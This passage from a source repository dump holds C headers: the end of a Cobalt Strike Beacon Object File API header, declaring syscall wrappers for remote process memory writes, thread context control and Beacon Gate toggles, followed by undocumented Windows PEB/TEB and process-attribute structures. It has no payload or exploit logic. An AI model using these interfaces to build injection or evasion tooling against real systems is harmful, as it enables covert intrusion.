SYSCALL_API_ENTRY ntResumeThread; 289 | SYSCALL_API_ENTRY ntCreateThreadEx; 290 | SYSCALL_API_ENTRY ntOpenProcess; 291 | SYSCALL_API_ENTRY ntOpenThread; 292 | SYSCALL_API_ENTRY ntClose; 293 | SYSCALL_API_ENTRY ntCreateSection; 294 | SYSCALL_API_ENTRY ntMapViewOfSection; 295 | SYSCALL_API_ENTRY ntUnmapViewOfSection; 296 | SYSCALL_API_ENTRY ntQueryVirtualMemory; 297 | SYSCALL_API_ENTRY ntDuplicateObject; 298 | SYSCALL_API_ENTRY ntReadVirtualMemory; 299 | SYSCALL_API_ENTRY ntWriteVirtualMemory; 300 | SYSCALL_API_ENTRY ntReadFile; 301 | SYSCALL_API_ENTRY ntWriteFile; 302 | SYSCALL_API_ENTRY ntCreateFile; 303 | } SYSCALL_API, *PSYSCALL_API; 304 | 305 | /* Additional Run Time Library (RTL) addresses used to support system calls. 306 | * If they are not set then system calls that require them will fall back 307 | * to the Standard Windows API. 308 | * 309 | * Required to support the following system calls: 310 | * ntCreateFile 311 | */ 312 | typedef struct 313 | { 314 | PVOID rtlDosPathNameToNtPathNameUWithStatusAddr; 315 | PVOID rtlFreeHeapAddr; 316 | PVOID rtlGetProcessHeapAddr; 317 | } RTL_API, *PRTL_API; 318 | 319 | typedef struct 320 | { 321 | PSYSCALL_API syscalls; 322 | PRTL_API rtls; 323 | } BEACON_SYSCALLS, *PBEACON_SYSCALLS; 324 | 325 | DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, BOOL resolveIfNotInitialized); 326 | 327 | /* Beacon System call functions which will use the current system call method */ 328 | DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 329 | DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 330 | DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 331 | DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 332 | DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 333 | DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext); 334 | DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext); 335 | DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle); 336 | DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId); 337 | DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId); 338 | DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object); 339 | DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress); 340 | DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length); 341 | DECLSPEC_IMPORT BOOL BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions); 342 | DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 343 | DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 344 | 345 | /* Beacon Gate APIs */ 346 | DECLSPEC_IMPORT VOID BeaconDisableBeaconGate(); 347 | DECLSPEC_IMPORT VOID BeaconEnableBeaconGate(); 348 | 349 | /* Beacon User Data 350 | * 351 | * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch 352 | * e.g. 0x040900 -> CS 4.9 353 | * 0x041000 -> CS 4.10 354 | */ 355 | 356 | #define DLL_BEACON_USER_DATA 0x0d 357 | #define BEACON_USER_DATA_CUSTOM_SIZE 32 358 | typedef struct 359 | { 360 | unsigned int version; 361 | PSYSCALL_API syscalls; 362 | char custom[BEACON_USER_DATA_CUSTOM_SIZE]; 363 | PRTL_API rtls; 364 | PALLOCATED_MEMORY allocatedMemory; 365 | } USER_DATA, * PUSER_DATA; 366 | 367 | #ifdef __cplusplus 368 | } 369 | #endif // __cplusplus 370 | #endif // _BEACON_H_ 371 | -------------------------------------------------------------------------------- /include/Structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef STRUCTS_H 3 | #define STRUCTS_H 4 | 5 | #include 6 | 7 | #define STATUS_SUCCESS 0x00000000 8 | #define NtCurrentProcess() ( (HANDLE)-1 ) 9 | #define NtCurrentThread() ( (HANDLE)-2 ) 10 | #define NT_SUCCESS(STATUS) (((NTSTATUS)(STATUS)) >= STATUS_SUCCESS) 11 | 12 | typedef struct _LSA_UNICODE_STRING { 13 | USHORT Length; 14 | USHORT MaximumLength; 15 | PWSTR Buffer; 16 | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR; 17 | 18 | 19 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 20 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 21 | (p)->RootDirectory = r; \ 22 | (p)->Attributes = a; \ 23 | (p)->ObjectName = n; \ 24 | (p)->SecurityDescriptor = s; \ 25 | (p)->SecurityQualityOfService = NULL; \ 26 | } 27 | 28 | #define OBJ_INHERIT 0x00000002L 29 | #define OBJ_PERMANENT 0x00000010L 30 | #define OBJ_EXCLUSIVE 0x00000020L 31 | #define OBJ_CASE_INSENSITIVE 0x00000040L 32 | #define OBJ_OPENIF 0x00000080L 33 | #define OBJ_OPENLINK 0x00000100L 34 | #define OBJ_KERNEL_HANDLE 0x00000200L 35 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400L 36 | #define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800L 37 | #define OBJ_DONT_REPARSE 0x00001000L 38 | #define OBJ_VALID_ATTRIBUTES 0x00001FF2L 39 | 40 | typedef struct _BASE_RELOCATION_ENTRY { 41 | WORD Offset : 12; 42 | WORD Type : 4; 43 | } BASE_RELOCATION_ENTRY, * PBASE_RELOCATION_ENTRY; 44 | 45 | 46 | typedef enum _SECTION_INHERIT { 47 | ViewShare = 1, 48 | ViewUnmap = 2 49 | } SECTION_INHERIT, * PSECTION_INHERIT; 50 | 51 | 52 | #define RTL_MAX_DRIVE_LETTERS 32 53 | 54 | 55 | 56 | typedef struct _RTL_DRIVE_LETTER_CURDIR 57 | { 58 | USHORT Flags; 59 | USHORT Length; 60 | ULONG TimeStamp; 61 | UNICODE_STRING DosPath; 62 | 63 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 64 | 65 | typedef struct _CURDIR 66 | { 67 | UNICODE_STRING DosPath; 68 | HANDLE Handle; 69 | 70 | } CURDIR, * PCURDIR; 71 | 72 | 73 | typedef struct _RTL_USER_PROCESS_PARAMETERS 74 | { 75 | ULONG MaximumLength; 76 | ULONG Length; 77 | 78 | ULONG Flags; 79 | ULONG DebugFlags; 80 | 81 | HANDLE ConsoleHandle; 82 | ULONG ConsoleFlags; 83 | HANDLE StandardInput; 84 | HANDLE StandardOutput; 85 | HANDLE StandardError; 86 | 87 | CURDIR CurrentDirectory; 88 | UNICODE_STRING DllPath; 89 | UNICODE_STRING ImagePathName; 90 | UNICODE_STRING CommandLine; 91 | PWCHAR Environment; 92 | 93 | ULONG StartingX; 94 | ULONG StartingY; 95 | ULONG CountX; 96 | ULONG CountY; 97 | ULONG CountCharsX; 98 | ULONG CountCharsY; 99 | ULONG FillAttribute; 100 | 101 | ULONG WindowFlags; 102 | ULONG ShowWindowFlags; 103 | UNICODE_STRING WindowTitle; 104 | UNICODE_STRING DesktopInfo; 105 | UNICODE_STRING ShellInfo; 106 | UNICODE_STRING RuntimeData; 107 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 108 | 109 | ULONG_PTR EnvironmentSize; 110 | ULONG_PTR EnvironmentVersion; 111 | PVOID PackageDependencyData; 112 | ULONG ProcessGroupId; 113 | ULONG LoaderThreads; 114 | 115 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 116 | 117 | typedef struct _LDR_MODULE { 118 | LIST_ENTRY InLoadOrderModuleList; 119 | LIST_ENTRY InMemoryOrderModuleList; 120 | LIST_ENTRY InInitializationOrderModuleList; 121 | PVOID BaseAddress; 122 | PVOID EntryPoint; 123 | ULONG SizeOfImage; 124 | UNICODE_STRING FullDllName; 125 | UNICODE_STRING BaseDllName; 126 | ULONG Flags; 127 | SHORT LoadCount; 128 | SHORT TlsIndex; 129 | LIST_ENTRY HashTableEntry; 130 | ULONG TimeDateStamp; 131 | } LDR_MODULE, * PLDR_MODULE; 132 | 133 | typedef struct _PEB_LDR_DATA { 134 | ULONG Length; 135 | ULONG Initialized; 136 | PVOID SsHandle; 137 | LIST_ENTRY InLoadOrderModuleList; 138 | LIST_ENTRY InMemoryOrderModuleList; 139 | LIST_ENTRY InInitializationOrderModuleList; 140 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 141 | 142 | typedef struct _PEB { 143 | BOOLEAN InheritedAddressSpace; 144 | BOOLEAN ReadImageFileExecOptions; 145 | BOOLEAN BeingDebugged; 146 | BOOLEAN Spare; 147 | HANDLE Mutant; 148 | PVOID ImageBase; 149 | PPEB_LDR_DATA LoaderData; 150 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 151 | PVOID SubSystemData; 152 | PVOID ProcessHeap; 153 | PVOID FastPebLock; 154 | PVOID FastPebLockRoutine; 155 | PVOID FastPebUnlockRoutine; 156 | ULONG EnvironmentUpdateCount; 157 | PVOID* KernelCallbackTable; 158 | PVOID EventLogSection; 159 | PVOID EventLog; 160 | PVOID FreeList; 161 | ULONG TlsExpansionCounter; 162 | PVOID TlsBitmap; 163 | ULONG TlsBitmapBits[0x2]; 164 | PVOID ReadOnlySharedMemoryBase; 165 | PVOID ReadOnlySharedMemoryHeap; 166 | PVOID* ReadOnlyStaticServerData; 167 | PVOID AnsiCodePageData; 168 | PVOID OemCodePageData; 169 | PVOID UnicodeCaseTableData; 170 | ULONG NumberOfProcessors; 171 | ULONG NtGlobalFlag; 172 | BYTE Spare2[0x4]; 173 | LARGE_INTEGER CriticalSectionTimeout; 174 | ULONG HeapSegmentReserve; 175 | ULONG HeapSegmentCommit; 176 | ULONG HeapDeCommitTotalFreeThreshold; 177 | ULONG HeapDeCommitFreeBlockThreshold; 178 | ULONG NumberOfHeaps; 179 | ULONG MaximumNumberOfHeaps; 180 | PVOID** ProcessHeaps; 181 | PVOID GdiSharedHandleTable; 182 | PVOID ProcessStarterHelper; 183 | PVOID GdiDCAttributeList; 184 | PVOID LoaderLock; 185 | ULONG OSMajorVersion; 186 | ULONG OSMinorVersion; 187 | ULONG OSBuildNumber; 188 | ULONG OSPlatformId; 189 | ULONG ImageSubSystem; 190 | ULONG ImageSubSystemMajorVersion; 191 | ULONG ImageSubSystemMinorVersion; 192 | ULONG GdiHandleBuffer[0x22]; 193 | ULONG PostProcessInitRoutine; 194 | ULONG TlsExpansionBitmap; 195 | BYTE TlsExpansionBitmapBits[0x80]; 196 | ULONG SessionId; 197 | } PEB, * PPEB; 198 | 199 | typedef struct __CLIENT_ID { 200 | HANDLE UniqueProcess; 201 | HANDLE UniqueThread; 202 | } CLIENT_ID, * PCLIENT_ID; 203 | 204 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 205 | ULONG Flags; 206 | PCHAR FrameName; 207 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT; 208 | 209 | typedef struct _TEB_ACTIVE_FRAME { 210 | ULONG Flags; 211 | struct _TEB_ACTIVE_FRAME* Previous; 212 | PTEB_ACTIVE_FRAME_CONTEXT Context; 213 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME; 214 | 215 | typedef struct _GDI_TEB_BATCH { 216 | ULONG Offset; 217 | ULONG HDC; 218 | ULONG Buffer[310]; 219 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH; 220 | 221 | typedef PVOID PACTIVATION_CONTEXT; 222 | 223 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { 224 | struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous; 225 | PACTIVATION_CONTEXT ActivationContext; 226 | ULONG Flags; 227 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME; 228 | 229 | typedef struct _ACTIVATION_CONTEXT_STACK { 230 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame; 231 | LIST_ENTRY FrameListCache; 232 | ULONG Flags; 233 | ULONG NextCookieSequenceNumber; 234 | ULONG StackId; 235 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK; 236 | 237 | typedef struct _TEB { 238 | NT_TIB NtTib; 239 | PVOID EnvironmentPointer; 240 | CLIENT_ID ClientId; 241 | PVOID ActiveRpcHandle; 242 | PVOID ThreadLocalStoragePointer; 243 | PPEB ProcessEnvironmentBlock; 244 | ULONG LastErrorValue; 245 | ULONG CountOfOwnedCriticalSections; 246 | PVOID CsrClientThread; 247 | PVOID Win32ThreadInfo; 248 | ULONG User32Reserved[26]; 249 | ULONG UserReserved[5]; 250 | PVOID WOW32Reserved; 251 | LCID CurrentLocale; 252 | ULONG FpSoftwareStatusRegister; 253 | PVOID SystemReserved1[54]; 254 | LONG ExceptionCode; 255 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 256 | PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer; 257 | UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)]; 258 | ULONG TxFsContext; 259 | #elif (NTDDI_VERSION >= NTDDI_WS03) 260 | PACTIVATION_CONTEXT_STACK ActivationContextStackPointer; 261 | UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)]; 262 | #else 263 | ACTIVATION_CONTEXT_STACK ActivationContextStack; 264 | UCHAR SpareBytes1[24]; 265 | #endif 266 | GDI_TEB_BATCH GdiTebBatch; 267 | CLIENT_ID RealClientId; 268 | PVOID GdiCachedProcessHandle; 269 | ULONG GdiClientPID; 270 | ULONG GdiClientTID; 271 | PVOID GdiThreadLocalInfo; 272 | PSIZE_T Win32ClientInfo[62]; 273 | PVOID glDispatchTable[233]; 274 | PSIZE_T glReserved1[29]; 275 | PVOID glReserved2; 276 | PVOID glSectionInfo; 277 | PVOID glSection; 278 | PVOID glTable; 279 | PVOID glCurrentRC; 280 | PVOID glContext; 281 | NTSTATUS LastStatusValue; 282 | UNICODE_STRING StaticUnicodeString; 283 | WCHAR StaticUnicodeBuffer[261]; 284 | PVOID DeallocationStack; 285 | PVOID TlsSlots[64]; 286 | LIST_ENTRY TlsLinks; 287 | PVOID Vdm; 288 | PVOID ReservedForNtRpc; 289 | PVOID DbgSsReserved[2]; 290 | #if (NTDDI_VERSION >= NTDDI_WS03) 291 | ULONG HardErrorMode; 292 | #else 293 | ULONG HardErrorsAreDisabled; 294 | #endif 295 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 296 | PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)]; 297 | GUID ActivityId; 298 | PVOID SubProcessTag; 299 | PVOID EtwLocalData; 300 | PVOID EtwTraceData; 301 | #elif (NTDDI_VERSION >= NTDDI_WS03) 302 | PVOID Instrumentation[14]; 303 | PVOID SubProcessTag; 304 | PVOID EtwLocalData; 305 | #else 306 | PVOID Instrumentation[16]; 307 | #endif 308 | PVOID WinSockData; 309 | ULONG GdiBatchCount; 310 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 311 | BOOLEAN SpareBool0; 312 | BOOLEAN SpareBool1; 313 | BOOLEAN SpareBool2; 314 | #else 315 | BOOLEAN InDbgPrint; 316 | BOOLEAN FreeStackOnTermination; 317 | BOOLEAN HasFiberData; 318 | #endif 319 | UCHAR IdealProcessor; 320 | #if (NTDDI_VERSION >= NTDDI_WS03) 321 | ULONG GuaranteedStackBytes; 322 | #else 323 | ULONG Spare3; 324 | #endif 325 | PVOID ReservedForPerf; 326 | PVOID ReservedForOle; 327 | ULONG WaitingOnLoaderLock; 328 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 329 | PVOID SavedPriorityState; 330 | ULONG_PTR SoftPatchPtr1; 331 | ULONG_PTR ThreadPoolData; 332 | #elif (NTDDI_VERSION >= NTDDI_WS03) 333 | ULONG_PTR SparePointer1; 334 | ULONG_PTR SoftPatchPtr1; 335 | ULONG_PTR SoftPatchPtr2; 336 | #else 337 | Wx86ThreadState Wx86Thread; 338 | #endif 339 | PVOID* TlsExpansionSlots; 340 | #if defined(_WIN64) && !defined(EXPLICIT_32BIT) 341 | PVOID DeallocationBStore; 342 | PVOID BStoreLimit; 343 | #endif 344 | ULONG ImpersonationLocale; 345 | ULONG IsImpersonating; 346 | PVOID NlsCache; 347 | PVOID pShimData; 348 | ULONG HeapVirtualAffinity; 349 | HANDLE CurrentTransactionHandle; 350 | PTEB_ACTIVE_FRAME ActiveFrame; 351 | #if (NTDDI_VERSION >= NTDDI_WS03) 352 | PVOID FlsData; 353 | #endif 354 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 355 | PVOID PreferredLangauges; 356 | PVOID UserPrefLanguages; 357 | PVOID MergedPrefLanguages; 358 | ULONG MuiImpersonation; 359 | union 360 | { 361 | struct 362 | { 363 | USHORT SpareCrossTebFlags : 16; 364 | }; 365 | USHORT CrossTebFlags; 366 | }; 367 | union 368 | { 369 | struct 370 | { 371 | USHORT DbgSafeThunkCall : 1; 372 | USHORT DbgInDebugPrint : 1; 373 | USHORT DbgHasFiberData : 1; 374 | USHORT DbgSkipThreadAttach : 1; 375 | USHORT DbgWerInShipAssertCode : 1; 376 | USHORT DbgIssuedInitialBp : 1; 377 | USHORT DbgClonedThread : 1; 378 | USHORT SpareSameTebBits : 9; 379 | }; 380 | USHORT SameTebFlags; 381 | }; 382 | PVOID TxnScopeEntercallback; 383 | PVOID TxnScopeExitCAllback; 384 | PVOID TxnScopeContext; 385 | ULONG LockCount; 386 | ULONG ProcessRundown; 387 | ULONG64 LastSwitchTime; 388 | ULONG64 TotalSwitchOutTime; 389 | LARGE_INTEGER WaitReasonBitMap; 390 | #else 391 | BOOLEAN SafeThunkCall; 392 | BOOLEAN BooleanSpare[3]; 393 | #endif 394 | } TEB, * PTEB; 395 | 396 | typedef struct _LDR_DATA_TABLE_ENTRY { 397 | LIST_ENTRY InLoadOrderLinks; 398 | LIST_ENTRY InMemoryOrderLinks; 399 | LIST_ENTRY InInitializationOrderLinks; 400 | PVOID DllBase; 401 | PVOID EntryPoint; 402 | ULONG SizeOfImage; 403 | UNICODE_STRING FullDllName; 404 | UNICODE_STRING BaseDllName; 405 | ULONG Flags; 406 | WORD LoadCount; 407 | WORD TlsIndex; 408 | union { 409 | LIST_ENTRY HashLinks; 410 | struct { 411 | PVOID SectionPointer; 412 | ULONG CheckSum; 413 | }; 414 | }; 415 | union { 416 | ULONG TimeDateStamp; 417 | PVOID LoadedImports; 418 | }; 419 | PACTIVATION_CONTEXT EntryPointActivationContext; 420 | PVOID PatchInformation; 421 | LIST_ENTRY ForwarderLinks; 422 | LIST_ENTRY ServiceTagLinks; 423 | LIST_ENTRY StaticLinks; 424 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 425 | 426 | 427 | typedef struct _INITIAL_TEB { 428 | PVOID StackBase; 429 | PVOID StackLimit; 430 | PVOID StackCommit; 431 | PVOID StackCommitMax; 432 | PVOID StackReserved; 433 | } INITIAL_TEB, * PINITIAL_TEB; 434 | 435 | typedef struct _OBJECT_ATTRIBUTES { 436 | ULONG Length; 437 | HANDLE RootDirectory; 438 | PUNICODE_STRING ObjectName; 439 | ULONG Attributes; 440 | PVOID SecurityDescriptor; 441 | PVOID SecurityQualityOfService; 442 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 443 | 444 | 445 | 446 | 447 | typedef enum _PS_CREATE_STATE 448 | { 449 | PsCreateInitialState, 450 | PsCreateFailOnFileOpen, 451 | PsCreateFailOnSectionCreate, 452 | PsCreateFailExeFormat, 453 | PsCreateFailMachineMismatch, 454 | PsCreateFailExeName, 455 | PsCreateSuccess, 456 | PsCreateMaximumStates 457 | 458 | } PS_CREATE_STATE; 459 | 460 | typedef struct _PS_CREATE_INFO 461 | { 462 | SIZE_T Size; 463 | PS_CREATE_STATE State; 464 | union 465 | { 466 | struct 467 | { 468 | union 469 | { 470 | ULONG InitFlags; 471 | struct 472 | { 473 | UCHAR WriteOutputOnExit : 1; 474 | UCHAR DetectManifest : 1; 475 | UCHAR IFEOSkipDebugger : 1; 476 | UCHAR IFEODoNotPropagateKeyState : 1; 477 | UCHAR SpareBits1 : 4; 478 | UCHAR SpareBits2 : 8; 479 | USHORT ProhibitedImageCharacteristics : 16; 480 | } s1; 481 | } u1; 482 | ACCESS_MASK AdditionalFileAccess; 483 | } InitState; 484 | 485 | struct 486 | { 487 | HANDLE FileHandle; 488 | } FailSection; 489 | 490 | struct 491 | { 492 | USHORT DllCharacteristics; 493 | } ExeFormat; 494 | 495 | struct 496 | { 497 | HANDLE IFEOKey; 498 | } ExeName; 499 | 500 | struct 501 | { 502 | union 503 | { 504 | ULONG OutputFlags; 505 | struct 506 | { 507 | UCHAR ProtectedProcess : 1; 508 | UCHAR AddressSpaceOverride : 1; 509 | UCHAR DevOverrideEnabled : 1; 510 | UCHAR ManifestDetected : 1; 511 | UCHAR ProtectedProcessLight : 1; 512 | UCHAR SpareBits1 : 3; 513 | UCHAR SpareBits2 : 8; 514 | USHORT SpareBits3 : 16; 515 | } s2; 516 | } u2; 517 | HANDLE FileHandle; 518 | HANDLE SectionHandle; 519 | ULONGLONG UserProcessParametersNative; 520 | ULONG UserProcessParametersWow64; 521 | ULONG CurrentParameterFlags; 522 | ULONGLONG PebAddressNative; 523 | ULONG PebAddressWow64; 524 | ULONGLONG ManifestAddress; 525 | ULONG ManifestSize; 526 | } SuccessState; 527 | }; 528 | 529 | } PS_CREATE_INFO, * PPS_CREATE_INFO; 530 | 531 | 532 | 533 | typedef struct _PS_ATTRIBUTE 534 | { 535 | ULONG_PTR Attribute; 536 | SIZE_T Size; 537 | union 538 | { 539 | ULONG_PTR Value; 540 | PVOID ValuePtr; 541 | }; 542 | PSIZE_T ReturnLength; 543 | 544 | } PS_ATTRIBUTE, * PPS_ATTRIBUTE; 545 | 546 | 547 | 548 | typedef struct _PS_ATTRIBUTE_LIST 549 | { 550 | SIZE_T TotalLength; 551 | PS_ATTRIBUTE Attributes[3]; 552 | 553 | } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; 554 | 555 | 556 | 557 | 558 | #define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff 559 | #define PS_ATTRIBUTE_THREAD 0x00010000 // Attribute may be used with thread creation 560 | #define PS_ATTRIBUTE_INPUT 0x00020000 // Attribute is input only 561 | #define PS_ATTRIBUTE_ADDITIVE 0x00040000 // Attribute may be "accumulated", e.g. bitmasks, counters, etc. 562 | 563 | typedef enum _PS_ATTRIBUTE_NUM 564 | { 565 | PsAttributeParentProcess, // in HANDLE 566 | PsAttributeDebugPort, // in HANDLE 567 | PsAttributeToken, // in HANDLE 568 | PsAttributeClientId, // out PCLIENT_ID 569 | PsAttributeTebAddress, // out PTEB 570 | PsAttributeImageName, // in PWSTR 571 | PsAttributeImageInfo, // out PSECTION_IMAGE_INFORMATION 572 | PsAttributeMemoryReserve, // in PPS_MEMORY_RESERVE 573 | PsAttributePriorityClass, // in UCHAR 574 | PsAttributeErrorMode, // in ULONG 575 | PsAttributeStdHandleInfo, // in PPS_STD_HANDLE_INFO 576 | PsAttributeHandleList, // in PHANDLE 577 | PsAttributeGroupAffinity, // in PGROUP_AFFINITY 578 | PsAttributePreferredNode, // in PUSHORT 579 | PsAttributeIdealProcessor, // in PPROCESSOR_NUMBER 580 | PsAttributeUmsThread, // see MSDN UpdateProceThreadAttributeList (CreateProcessW) - in PUMS_CREATE_THREAD_ATTRIBUTES 581 | PsAttributeMitigationOptions, // in UCHAR 582 | PsAttributeProtectionLevel, // in ULONG 583 | PsAttributeSecureProcess, // since THRESHOLD (Virtual Secure Mode, Device Guard) 584 | PsAttributeJobList, 585 | PsAttributeChildProcessPolicy, // since THRESHOLD2 586 | PsAttributeAllApplicationPackagesPolicy, // since REDSTONE 587 | PsAttributeWin32kFilter, 588 | PsAttributeSafeOpenPromptOriginClaim, 589 | PsAttributeBnoIsolation, 590 | PsAttributeDesktopAppPolicy, 591 | PsAttributeMax 592 | } PS_ATTRIBUTE_NUM; 593 | 594 | 595 | #define PsAttributeValue(Number, Thread, Input, Additive) \ 596 | (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \ 597 | ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \ 598 | ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \ 599 | ((Additive) ? PS_ATTRIBUTE_ADDITIVE : 0)) 600 | 601 | #define PS_ATTRIBUTE_PARENT_PROCESS \ 602 | PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE) 603 | #define PS_ATTRIBUTE_DEBUG_PORT \ 604 | PsAttributeValue(PsAttributeDebugPort, FALSE, TRUE, TRUE) 605 | #define PS_ATTRIBUTE_TOKEN \ 606 | PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE) 607 | #define PS_ATTRIBUTE_CLIENT_ID \ 608 | PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE) 609 | #define PS_ATTRIBUTE_TEB_ADDRESS \ 610 | PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE) 611 | #define PS_ATTRIBUTE_IMAGE_NAME \ 612 | PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE) 613 | #define PS_ATTRIBUTE_IMAGE_INFO \ 614 | PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE) 615 | #define PS_ATTRIBUTE_MEMORY_RESERVE \ 616 | PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE) 617 | #define PS_ATTRIBUTE_PRIORITY_CLASS \ 618 | PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE) 619 | #define PS_ATTRIBUTE_ERROR_MODE \ 620 | PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE) 621 | #define PS_ATTRIBUTE_STD_HANDLE_INFO \ 622 | PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE) 623 | #define PS_ATTRIBUTE_HANDLE_LIST \ 624 | PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE) 625 | #define PS_ATTRIBUTE_GROUP_AFFINITY \ 626 | PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE) 627 | #define PS_ATTRIBUTE_PREFERRED_NODE \ 628 | PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE) 629 | #define PS_ATTRIBUTE_IDEAL_PROCESSOR \ 630 | PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE) 631 | #define PS_ATTRIBUTE_MITIGATION_OPTIONS \ 632 | PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, FALSE) 633 | #define PS_ATTRIBUTE_PROTECTION_LEVEL \ 634 | PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, FALSE) 635 | #define PS_ATTRIBUTE_UMS_THREAD \ 636 | PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE) 637 | #define PS_ATTRIBUTE_SECURE_PROCESS \ 638 | PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE) 639 | #define PS_ATTRIBUTE_JOB_LIST \ 640 | PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE) 641 | #define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \ 642 | PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE) 643 | #define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \ 644 | PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE) 645 | #define PS_ATTRIBUTE_WIN32K_FILTER \ 646 | PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE) 647 | #define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \ 648 | PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE) 649 | #define PS_ATTRIBUTE_BNO_ISOLATION \ 650 | PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE) 651 | #define PS_ATTRIBUTE_DESKTOP_APP_POLICY \ 652 | PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE) 653 | 654 | 655 | 656 | 657 | #define 